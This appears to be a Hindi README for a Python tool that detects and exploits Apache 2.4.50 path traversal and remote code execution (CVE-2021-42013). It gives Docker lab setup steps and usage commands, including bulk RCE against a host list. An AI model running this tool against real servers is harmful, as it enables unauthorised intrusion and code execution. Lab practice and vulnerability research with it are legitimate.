
Apache 2.4.50 (CVE-2021-42013) में पथ ट्रैवर्सल और दूरस्थ कोड निष्पादन का पता लगाने और शोषण करने के लिए पायथन स्क्रिप्ट, बल्क स्कैनिंग और अभ्यास के लिए Docker लैब के साथ।
CVE-2021-42013.py एक पायथन स्क्रिप्ट है जो Apache 2.4.50 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन भेद्यता खोजने में मदद करेगी। CVE-2021-42013 पर हाथ आज़माने के लिए Docker का एक कमजोर उदाहरण प्रदान किया गया है।
यदि CGI-BIN सक्षम है, तो हम रिमोट कोड निष्पादन कर सकते हैं लेकिन पथ ट्रैवर्सल नहीं, इसलिए पथ ट्रैवर्सल भेद्यता की जाँच के लिए httpd.conf में Alias अनुभाग के अंतर्गत "icons" निर्देशिका जोड़ी गई है।
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-42013 .
$ docker run -it cve-2021-42013
$ python3 cve-2021-42013.py -u http://172.17.0.2
$ python3 cve-2021-42013.py -u http://172.17.0.2 -pt
$ python3 cve-2021-42013.py -u http://172.17.0.2 -rce
$ python3 cve-2021-42013.py -l list.txt
$ python3 cve-2021-42013.py -l list.txt -pt
$ python3 cve-2021-42013.py -l list.txt -rce
अधिक जानकारी यहाँ पाई जा सकती है।